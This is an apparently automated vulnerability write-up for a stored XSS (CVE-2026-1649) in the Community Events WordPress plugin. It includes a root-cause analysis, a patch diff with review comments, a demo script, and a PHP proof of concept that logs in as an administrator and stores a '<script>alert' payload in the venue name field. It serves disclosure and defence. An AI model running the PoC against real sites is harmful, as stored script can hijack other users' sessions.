Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1649: Community Events <= 1.5.7 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'ce_venue_name' Parameter (community-events)

CVE ID CVE-2026-1649
Severity Medium (CVSS 4.4)
CWE 79
Vulnerable Version 1.5.7
Patched Version 1.5.8
Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1649:
The Community Events WordPress plugin version 1.5.7 and earlier contains an authenticated stored cross-site scripting vulnerability. The flaw exists in the venue management interface, allowing administrators to inject malicious scripts via the ‘ce_venue_name’ parameter. The vulnerability has a CVSS score of 4.4 and requires administrator-level access for exploitation.

The root cause is missing output escaping when venue data is rendered in several plugin contexts. The vulnerable code paths are in community-events.php lines 1401, 1449, 1615, 1961, and 2124. These lines echo the stored venue fields directly into three different contexts: HTML attribute values (the value="…" inputs of the edit form and the title="…" of the event tooltip), HTML text content (the admin venue list and the venue drop-down), and, for the city, a link query string. The ‘ce_venue_name’ value flows from the form through database storage to the output without being encoded at any stage. The stripslashes() call on these lines only removes the backslashes WordPress adds when the value is stored; it does not encode <, >, & or quotes, so it provides no XSS protection on its own.

Exploitation requires an authenticated administrator to open the venue management page at /wp-admin/admin.php?page=community-events-venues and submit a payload in the ‘ce_venue_name’ field while creating or editing a venue. The payload is stored in the ce_venues table and executes whenever that venue is rendered: in the admin venue list, in the venue drop-down, and on the front end in the events listing, the random-event output, and the venue tooltips.

The patch in version 1.5.8 adds output escaping to every venue data sink it touches. It wraps the venue name in esc_html() at lines 1401, 1449, 1615, 1961, and 2124, applies esc_html() to the other venue fields (address, city, zip code, phone, and email), uses esc_url() for the venue URL, and casts venue IDs and item counts with intval(). esc_html() encodes &, <, > and both quote characters as HTML entities, so the stored value is displayed verbatim but can no longer close an attribute or open a tag; esc_url() additionally rejects URLs whose scheme is not in WordPress' allowed list, such as javascript:. Note that esc_html() is also used where the value lands inside an HTML attribute (the value="…" inputs and the tooltip title="…"). That is effective because esc_html() encodes quotes, although esc_attr() is the function WordPress provides for that context.
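To make the context point concrete, here is an added PHP example written for this write-up; it is not code from the Community Events plugin or its patch. It re-creates the sinks the patch touches (the edit-form value= attribute, the admin list cell, the tooltip title= attribute, and the city link in the two $output blocks) and renders a constructed venue row once the 1.5.7 way and once escaped. WordPress' esc_html() and esc_attr() are not available outside WordPress, so the demo_esc_html()/demo_esc_attr() stand-ins, the example.test base URL and the venue row are all assumptions made for the demo; the city link deliberately uses rawurlencode() rather than the esc_html() the real patch applies there, to show the difference.

```php
<?php
// Added example for this write-up, not code from the Community Events plugin.
// It re-creates the output contexts the 1.5.8 patch touches and renders a
// constructed venue row once the 1.5.7 way (stripslashes() only) and once
// with a context-matched escaper. WordPress' esc_html()/esc_attr() are not
// available here, so the demo_* stand-ins approximate them with
// htmlspecialchars(); that approximation, the example.test URL and the venue
// row are assumptions made for the demo.

function demo_esc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Same encoding as demo_esc_html(); WordPress keeps esc_attr() as a separate
// function so the call site names the context (an attribute value).
function demo_esc_attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Renders the sinks the plugin uses for one venue row: the edit-form value=
// attribute, the admin list cell, the tooltip title= attribute and the city
// link's query string (the $output blocks around lines 1961 and 2124).
function render_venue(array $v, bool $patched): array
{
    $name = stripslashes($v['ce_venue_name']); // 1.5.7 already did this
    $city = $v['ce_venue_city'];
    $base = 'https://example.test/schedule/';  // stands in for $fullscheduleurl

    if (!$patched) {
        return [
            'form_value' => '<input type="text" name="ce_venue_name" value="' . $name . '"/>',
            'list_cell'  => '<strong>' . $name . '</strong>',
            'tooltip'    => '<span class="cetooltip" title="<strong>' . $name
                            . '</strong><br />' . $city . '">',
            'city_link'  => "<a href='" . $base . "?locationset=1&location=" . $city . "'>",
        ];
    }
    return [
        'form_value' => '<input type="text" name="ce_venue_name" value="' . demo_esc_attr($name) . '"/>',
        'list_cell'  => '<strong>' . demo_esc_html($name) . '</strong>',
        'tooltip'    => '<span class="cetooltip" title="<strong>' . demo_esc_attr($name)
                        . '</strong><br />' . demo_esc_attr($city) . '">',
        // The real patch runs the city through esc_html() here; a query-string
        // value needs percent-encoding, so this line uses rawurlencode() instead.
        'city_link'  => "<a href='" . $base . "?locationset=1&location=" . rawurlencode($city) . "'>",
    ];
}

// Constructed venue row as it would come back from the ce_venues table, with
// the backslashes WordPress adds on storage (hence the stripslashes() above).
// The name closes the value="" attribute, adds an event handler, and carries a
// <script> element for the text context; the city holds characters that change
// meaning inside a query string.
$venue = [
    'ce_venue_name' => 'Hall\" onfocus=\"alert(1)\" autofocus=\"<script>alert(2)</script>',
    'ce_venue_city' => 'Sainte-Anne & Co #1',
];

foreach ([false, true] as $patched) {
    echo $patched ? "--- 1.5.8 style (escaped) ---\n" : "--- 1.5.7 style (stripslashes only) ---\n";
    foreach (render_venue($venue, $patched) as $context => $html) {
        printf("%-11s %s\n", $context, $html);
    }
}
```

Run it with php on the command line. In the 1.5.7 rows the venue name terminates the value and title attributes and the <script> element survives intact in the list cell; in the escaped rows every < and " is an entity, and the city link keeps its & and # because they are percent-encoded rather than HTML-encoded. Comparing the two city_link lines is the quickest way to see why esc_html() is the wrong tool for a query string even though it is the right one for the text beside it.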

Successful exploitation lets an attacker who already holds administrator privileges store JavaScript that executes in the browser of every user who views the affected venue data, including other administrators and site visitors. That can be used for session hijacking, takeover of other privileged accounts, content defacement, or redirection to malicious sites. Because a single-site WordPress administrator normally holds the unfiltered_html capability and can already publish arbitrary HTML, the issue is chiefly relevant on multisite installations and on sites where that capability has been removed (for example with DISALLOW_UNFILTERED_HTML), which is what the Medium 4.4 score reflects.

Differential between vulnerable and patched code

Code Diff
--- a/community-events/community-events.php
+++ b/community-events/community-events.php
@@ -2,7 +2,7 @@
 /*Plugin Name: Community Events
 Plugin URI: https://ylefebvre.github.io/wordpress-plugins/community-events/
 Description: A plugin used to manage events and display them in a widget
-Version: 1.5.7
+Version: 1.5.8
 Author: Yannick Lefebvre
 Author URI: https://ylefebvre.github.io
 Copyright 2025  Yannick Lefebvre  (email : ylefebvre@gmail.com)
@@ -1400,34 +1400,34 @@
 					<table style='width: 100%'>
 						<tr>
 							<td><?php _e( 'Venue Name', 'community-events' ); ?></td>
-							<td><input style="width:95%" type="text" name="ce_venue_name" <?php if ($mode == "edit") echo 'value="' . stripslashes($selectedvenue->ce_venue_name) . '"';?>/></td>
+							<td><input style="width:95%" type="text" name="ce_venue_name" <?php if ($mode == "edit") echo 'value="' . esc_html( stripslashes( $selectedvenue->ce_venue_name ) ) . '"';?>/></td>
 						</tr>
 						<tr>
 							<td><?php _e( 'Venue Address', 'community-events' ); ?></td>
-							<td><input style="width:95%" type="text" name="ce_venue_address" <?php if ($mode == "edit") echo "value='" . stripslashes($selectedvenue->ce_venue_address) . "'";?>/></td>
+							<td><input style="width:95%" type="text" name="ce_venue_address" <?php if ($mode == "edit") echo "value='" . esc_html( stripslashes( $selectedvenue->ce_venue_address ) ) . "'";?>/></td>
 						</tr>
 						<tr>
 							<td><?php _e( 'Venue City', 'community-events' ); ?></td>
-							<td><input style="width:95%" type="text" name="ce_venue_city" <?php if ($mode == "edit") echo "value='" . stripslashes($selectedvenue->ce_venue_city) . "'";?>/></td>
+							<td><input style="width:95%" type="text" name="ce_venue_city" <?php if ($mode == "edit") echo "value='" . esc_html( stripslashes( $selectedvenue->ce_venue_city ) ). "'";?>/></td>
 						</tr>
 						<tr>
 							<td><?php _e( 'Venue Zip Code', 'community-events' ); ?></td>
-							<td><input style="width:95%" type="text" name="ce_venue_zipcode" <?php if ($mode == "edit") echo "value='" . $selectedvenue->ce_venue_zipcode . "'";?>/></td>
+							<td><input style="width:95%" type="text" name="ce_venue_zipcode" <?php if ($mode == "edit") echo "value='" . esc_html( $selectedvenue->ce_venue_zipcode ) . "'";?>/></td>
 						</tr>
 						<tr>
 							<td><?php _e( 'Venue Phone', 'community-events' ); ?></td>
-							<td><input style="width:95%" type="text" name="ce_venue_phone" <?php if ($mode == "edit") echo "value='" . $selectedvenue->ce_venue_phone . "'";?>/></td>
+							<td><input style="width:95%" type="text" name="ce_venue_phone" <?php if ($mode == "edit") echo "value='" . esc_html( $selectedvenue->ce_venue_phone ) . "'";?>/></td>
 						</tr>
 						<tr>
 							<td><?php _e( 'Venue E-mail', 'community-events' ); ?></td>
-							<td><input style="width:95%" type="text" name="ce_venue_email" <?php if ($mode == "edit") echo "value='" . $selectedvenue->ce_venue_email . "'";?>/></td>
+							<td><input style="width:95%" type="text" name="ce_venue_email" <?php if ($mode == "edit") echo "value='" . esc_html( $selectedvenue->ce_venue_email ) . "'";?>/></td>
 						</tr>
 						<tr>
 							<td><?php _e( 'Venue URL', 'community-events' ); ?></td>
-							<td><input style="width:95%" type="text" name="ce_venue_url" <?php if ($mode == "edit") echo "value='" . $selectedvenue->ce_venue_url . "'";?>/></td>
+							<td><input style="width:95%" type="text" name="ce_venue_url" <?php if ($mode == "edit") echo "value='" . esc_url( $selectedvenue->ce_venue_url ) . "'";?>/></td>
 						</tr>
 					</table>
-					<input type="hidden" name="ce_venue_id" value="<?php if ($mode == "edit") echo $selectedvenue->ce_venue_id; ?>" />
+					<input type="hidden" name="ce_venue_id" value="<?php if ($mode == "edit") echo intval( $selectedvenue->ce_venue_id ); ?>" />
 				</td>
 				<td style='width:55%; vertical-align: top;'>
 					<?php $venues = $wpdb->get_results("SELECT count( e.event_id ) AS nbitems, v.ce_venue_id, v.ce_venue_name FROM " . $wpdb->prefix . "ce_venues v LEFT JOIN " . $wpdb->prefix . "ce_events e ON e.event_venue = v.ce_venue_id GROUP BY v.ce_venue_id ORDER by v.ce_venue_name");
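Review bot: the new esc_html() calls at 1401 and on the five fields below it sit inside value="…" and value='…' attributes, where esc_attr() is the context-matched WordPress escaper. esc_html() does encode both quote characters (it is built on _wp_specialchars with ENT_QUOTES), so the fix holds, but using esc_attr() would make the intent readable and is worth doing together with normalising the attribute quoting in this block, which mixes double quotes for ce_venue_name with single quotes for the other six inputs.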
@@ -1447,11 +1447,11 @@

 					<?php foreach($venues as $venue): ?>
 						<tr>
-						<td class='name column-name' style='background: #FFF'><?php echo $venue->ce_venue_id; ?></td>
-						<td style='background: #FFF'><a href='admin.php?page=community-events-venues&editvenue=<?php echo $venue->ce_venue_id; ?>'><strong><?php echo stripslashes($venue->ce_venue_name); ?></strong></a></td>
-						<td style='background: #FFF;text-align:right'><?php echo $venue->nbitems; ?></td>
-						<?php if ($venue->nbitems == 0): ?>
-						<td style='background:#FFF'><a href='admin.php?page=community-events-venues&deletevenue=<?php echo $venue->ce_venue_id; ?>&_wpnonce=<?php echo wp_create_nonce( 'ce_delete_venue' ); ?>'
+						<td class='name column-name' style='background: #FFF'><?php echo intval( $venue->ce_venue_id ); ?></td>
+						<td style='background: #FFF'><a href='admin.php?page=community-events-venues&editvenue=<?php echo intval( $venue->ce_venue_id ); ?>'><strong><?php echo esc_html( stripslashes( $venue->ce_venue_name ) ); ?></strong></a></td>
+						<td style='background: #FFF;text-align:right'><?php echo intval( $venue->nbitems ); ?></td>
+						<?php if ( $venue->nbitems == 0 ): ?>
+						<td style='background:#FFF'><a href='admin.php?page=community-events-venues&deletevenue=<?php echo intval( $venue->ce_venue_id ); ?>&_wpnonce=<?php echo wp_create_nonce( 'ce_delete_venue' ); ?>'
 						<?php echo "onclick="if ( confirm('" . esc_js(sprintf( __("You are about to delete this venue '%s'n  'Cancel' to stop, 'OK' to delete.", 'community-events' ), $venue->ce_venue_name )) . "') ) { return true;}return false;"" ?>><img src='<?php echo $this->cepluginpath; ?>/icons/delete.png' /></a></td>
 						<?php else: ?>
 						<td style='background: #FFF'></td>
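Review bot: the venue name still reaches the delete confirmation in this hunk only through esc_js() inside sprintf(); that is the right escaper for a single-quoted JavaScript string in an onclick attribute, so leaving the line untouched is correct, but since it is the one venue-name sink in the hunk the patch does not change, a short comment saying it was reviewed would stop the next reader from flagging it.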
@@ -1614,7 +1614,7 @@
 									else
 										$selectedstring = "";

-								echo "<option value='" . $venue->ce_venue_id . "' " . $selectedstring . ">" .  stripslashes($venue->ce_venue_name) . "n";
+								echo "<option value='" . $venue->ce_venue_id . "' " . $selectedstring . ">" .  esc_html( stripslashes( $venue->ce_venue_name ) ) . "n";
 							}
 						?></select></td>
 						</tr>
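Review bot: the venue name is now escaped in this option element, but $venue->ce_venue_id in the same "<option value='…'>" is still concatenated raw, while every other ce_venue_id sink in this patch is wrapped in intval(). Suggest "<option value='" . intval( $venue->ce_venue_id ) . "' " for consistency, since the ID lands inside a single-quoted attribute here as well.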
@@ -1960,23 +1960,23 @@

 					if ($event['ce_venue_name'] != "")
 					{
-						$output .= '<span class="cetooltip ce-venue-name" title="<strong>' . stripslashes($event['ce_venue_name']) . '</strong><br />' . stripslashes($event['ce_venue_address'])  . '<br />' . stripslashes($event['ce_venue_city']) . '<br />' . $event['ce_venue_zipcode'] . '<br />' . $event['ce_venue_email'] . '<br />' . $event['ce_venue_phone'] . '<br />' .  $event['ce_venue_url'] . '">';
+						$output .= '<span class="cetooltip ce-venue-name" title="<strong>' . esc_html( stripslashes( $event['ce_venue_name'] ) ) . '</strong><br />' . esc_html( stripslashes( $event['ce_venue_address'] ) )  . '<br />' . esc_html( stripslashes( $event['ce_venue_city'] ) ) . '<br />' . esc_html( $event['ce_venue_zipcode'] ) . '<br />' . esc_html( $event['ce_venue_email'] ) . '<br />' . esc_html( $event['ce_venue_phone'] ) . '<br />' .  esc_url( $event['ce_venue_url'] ) . '">';
 						if ($fullscheduleurl != '')
-							$output .= "<a href='" . $fullscheduleurl . "?venueset=1&venue=" . $event['ce_venue_id'] . "'>n";
+							$output .= "<a href='" . $fullscheduleurl . "?venueset=1&venue=" . intval( $event['ce_venue_id'] ) . "'>n";

-						$output .= stripslashes($event['ce_venue_name']);
+						$output .= esc_html( stripslashes( $event['ce_venue_name'] ) );

-						if ($fullscheduleurl != '')
+						if ( $fullscheduleurl != '' )
 							$output .= "</a>";

-						if ($event['ce_venue_city'] != "")
+						if ( $event['ce_venue_city'] != "" )
 						{
 							$output .= " / ";

 							if ($fullscheduleurl != '')
-								$output .=  "<a href='" . $fullscheduleurl . "?locationset=1&location=" . $event['ce_venue_city'] . "'>n";
+								$output .=  "<a href='" . $fullscheduleurl . "?locationset=1&location=" . esc_html( $event['ce_venue_city'] ) . "'>n";

-							$output .= $event['ce_venue_city'];
+							$output .= esc_html( $event['ce_venue_city'] );

 							if ($fullscheduleurl != '')
 								$output .= "</a>";
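Review bot: the location link in this hunk inserts the city into a query string ("?locationset=1&location=") through esc_html(), which encodes for HTML text, not for URLs: &, #, = and spaces are not percent-encoded, so a city containing & or # truncates the parameter once the browser decodes &amp; back to & and parses the URL. Use rawurlencode( $event['ce_venue_city'] ) there, or build the link with add_query_arg() and esc_url(); the esc_html() on the visible city text two lines later is correct. Note also that this path never applies stripslashes() to the city, unlike the random-event block below.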
@@ -2123,14 +2123,14 @@

 					$output .= "</span> ";

-					if ($events[$randomevent]['ce_venue_name'] != "")
+					if ( $events[$randomevent]['ce_venue_name'] != "" )
 					{
-						$output .= '<span class="cetooltip ce-venue-name" title="<strong>' . stripslashes($events[$randomevent]['ce_venue_name']) . '</strong><br />' . stripslashes($events[$randomevent]['ce_venue_address'])  . '<br />' . stripslashes($events[$randomevent]['ce_venue_city']) . '<br />' . $events[$randomevent]['ce_venue_zipcode'] . '<br />' . $events[$randomevent]['ce_venue_email'] . '<br />' . $events[$randomevent]['ce_venue_phone'] . '<br />' .  $events[$randomevent]['ce_venue_url'] . '">';
+						$output .= '<span class="cetooltip ce-venue-name" title="<strong>' . esc_html( stripslashes( $events[$randomevent]['ce_venue_name'] ) ) . '</strong><br />' . esc_html( stripslashes( $events[$randomevent]['ce_venue_address'] ) ) . '<br />' . esc_html( stripslashes( $events[$randomevent]['ce_venue_city'] ) ) . '<br />' . esc_html( $events[$randomevent]['ce_venue_zipcode'] ) . '<br />' . esc_html( $events[$randomevent]['ce_venue_email'] ) . '<br />' . esc_html( $events[$randomevent]['ce_venue_phone'] ) . '<br />' . esc_url( $events[$randomevent]['ce_venue_url'] ) . '">';

 						if ($fullscheduleurl != '')
-							$output .= "<a href='" . $fullscheduleurl . "?venueset=1&venue=" . $events[$randomevent]['ce_venue_id'] . "'>n";
+							$output .= "<a href='" . $fullscheduleurl . "?venueset=1&venue=" . intval( $events[$randomevent]['ce_venue_id'] ) . "'>n";

-						$output .= stripslashes($events[$randomevent]['ce_venue_name']);
+						$output .= esc_html( stripslashes( $events[$randomevent]['ce_venue_name'] ) );

 						if ($fullscheduleurl != '')
 							$output .= "</a>";
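Review bot: this random-event block is a near line-for-line copy of the listing block at 1960, and every esc_html()/esc_url()/intval() change had to be repeated in both places. A helper that renders one venue tooltip span from the venue fields and $fullscheduleurl would make the next escaping fix a single edit and remove the chance of the two paths drifting, which they already have on the stripslashes() handling of the city.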
@@ -2140,9 +2140,9 @@
 							$output .= " / ";

 							if ($fullscheduleurl != '')
-								$output .=  "<a href='" . $fullscheduleurl . "?locationset=1&location=" . stripslashes($events[$randomevent]['ce_venue_city']) . "'>n";
+								$output .=  "<a href='" . $fullscheduleurl . "?locationset=1&location=" . esc_html( stripslashes( $events[$randomevent]['ce_venue_city'] ) ) . "'>n";

-							$output .= stripslashes($events[$randomevent]['ce_venue_city']);
+							$output .= esc_html( stripslashes( $events[$randomevent]['ce_venue_city'] ) );

 							if ($fullscheduleurl != '')
 								$output .= "</a>";
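Review bot: same query-string issue as in the listing block: the "&location=" value here goes through esc_html( stripslashes( … ) ), so it is HTML-escaped but not URL-encoded. Suggest rawurlencode( stripslashes( $events[$randomevent]['ce_venue_city'] ) ) for the href and keep esc_html() only for the visible text on the following line.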

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1649 - Community Events <= 1.5.7 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'ce_venue_name' Parameter

$target_url = 'http://vulnerable-wordpress-site.com';
$username   = 'admin';
$password   = 'password';
$cookie_jar = __DIR__ . '/cookies.txt';

// Initialize cURL session for WordPress login; the cookie jar keeps the
// wordpress_logged_in_* cookie for the later requests on the same handle.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie'  => '1',
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute login and capture cookies
$response = curl_exec($ch);
if ($response === false) {
    die('Request failed: ' . curl_error($ch) . "\n");
}

// A failed login redirects back to wp-login.php with a #login_error box; a
// successful one lands on the dashboard, which carries the admin bar. Matching
// on 'wp-admin' alone is not enough, because the login form itself contains
// that string in its redirect_to field.
if (strpos($response, 'login_error') !== false || strpos($response, 'id="wpadminbar"') === false) {
    die("Login failed. Check credentials.\n");
}

// Navigate to the Community Events venue management page to get nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=community-events-venues');
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

// Extract nonce from the venue creation form (simplified - in real scenario use proper parsing)
// The form contains a nonce field named '_wpnonce' for venue creation
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

if ($nonce === '') {
    die("Could not extract nonce from venue management page.\n");
}

// XSS payload to demonstrate vulnerability
$xss_payload = '<script>alert("Atomic Edge XSS Test - CVE-2026-1649");</script>';

// Submit venue creation form with malicious payload
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=community-events-venues');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'ce_venue_name'    => $xss_payload,
    'ce_venue_address' => 'Test Address',
    'ce_venue_city'    => 'Test City',
    'ce_venue_zipcode' => '12345',
    'ce_venue_phone'   => '555-1234',
    'ce_venue_email'   => 'test@example.com',
    'ce_venue_url'     => 'http://example.com',
    'addvenue'         => 'Add Venue',
    '_wpnonce'         => $nonce,
]));

$response = curl_exec($ch);

// On 1.5.7 the venue list echoes the stored name raw, so the payload comes
// back byte-for-byte; on 1.5.8 esc_html() turns it into &lt;script&gt;...,
// which tells a stored-but-escaped result apart from a failed submission.
if (strpos($response, $xss_payload) !== false) {
    echo "Vulnerability confirmed: XSS payload stored and rendered unescaped.\n";
    echo "Visit the events page or venue management page to see script execution.\n";
} elseif (strpos($response, htmlspecialchars($xss_payload, ENT_QUOTES)) !== false) {
    echo "Payload was stored but rendered escaped: the site appears to be patched.\n";
} else {
    echo "Venue creation may have failed.\n";
}

curl_close($ch);
